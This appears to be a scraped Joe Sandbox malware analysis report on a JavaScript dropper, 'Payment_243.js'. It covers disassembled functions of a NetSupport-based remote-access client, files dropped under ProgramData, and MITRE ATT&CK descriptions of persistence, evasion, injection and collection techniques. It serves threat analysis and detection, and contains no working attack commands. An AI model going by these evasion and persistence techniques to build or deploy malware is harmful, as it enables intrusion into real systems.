API ID: CloseCreateFileHandle
String ID: \\.\NSWFPDrv
API String ID: 3498533004-85019792
Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0

Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32 ref: 1111316A
SendMessageA.USER32(00000000,00000414,00000000,00000000,?,1111EE7B,00000000,00000000), ref: 11113180

Strings

MSOfficeWClass, xrefs: 11113165

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FindMessageSendWindow
String ID: MSOfficeWClass
API String ID: 1741975844-970895155
Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC

Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 1115F338

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 1115F323
..\ctl32\wndclass.cpp, xrefs: 1115F31E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
String ID: ..\ctl32\wndclass.cpp$m_hWnd
API String ID: 1417657345-2201682149
Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681

Function 1101D390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 1101D3B4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
m_hWnd, xrefs: 1101D3A3

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMenuMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1590435379-2830328467
Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384

Function 1115B910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?,?,?,1115BD0F,?,?), ref: 1115B918
GetPropA.USER32(?,OldMenu), ref: 1115B928

Strings

OldMenu, xrefs: 1115B922

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MenuProp
String ID: OldMenu
API String ID: 601939786-3235417843
Opcode ID: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
Instruction ID: 00d1d82ffe912eb1f0033c226aa13db8fbf5a9b0d38ca05e3ef3a03686f26a50
Opcode Fuzzy Hash: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
Instruction Fuzzy Hash: CBC0123214257DA782016A95DD44DCBFB6DEE0A1557044022F520D2401E721551047E9

Function 11001B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 11001B84

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001B6E
m_hWnd, xrefs: 11001B73

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1426755417-2830328467
Opcode ID: fc0c8b9fffefdfec58d6b17608931234d5ca75a013e114f81d07d15824db0a83
Instruction ID: c965eeeb9282c2230bcc2d2e70a04aceb6947dc125d68a22ae0f57a9989a012e
Opcode Fuzzy Hash: fc0c8b9fffefdfec58d6b17608931234d5ca75a013e114f81d07d15824db0a83
Instruction Fuzzy Hash: B8D022B1E00235ABD7109656EC46FC5B2C8AB0E398F00407AF06262000E6B0E8808391

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to lowest risk score due to lack of data" ] }
Date: unknown

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment_243.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\x225qa0.zip

C:\ProgramData\x225qa0\HTCTL32.DLL

C:\ProgramData\x225qa0\NSM.LIC

C:\ProgramData\x225qa0\NSM.ini

C:\ProgramData\x225qa0\PCICHEK.DLL

C:\ProgramData\x225qa0\PCICL32.DLL

C:\ProgramData\x225qa0\TCCTL32.DLL

C:\ProgramData\x225qa0\client32.exe

C:\ProgramData\x225qa0\client32.ini

C:\ProgramData\x225qa0\guarantee\14844_13380793255498334.pma

C:\ProgramData\x225qa0\guarantee\17680_13380946966794438.pma

Windows Analysis Report
Payment_243.js

Function 1109E5B0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501
filethreadmemoryCOMMON

Function 11029BB0 Relevance: 93.3, APIs: 41, Strings: 12, Instructions: 534
libraryloadernetworkCOMMON

Function 11139ED0 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474
windowthreadCOMMON

Function 11134830 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278
libraryloadertimeCOMMON

Function 1102E0D0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630
COMMON

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre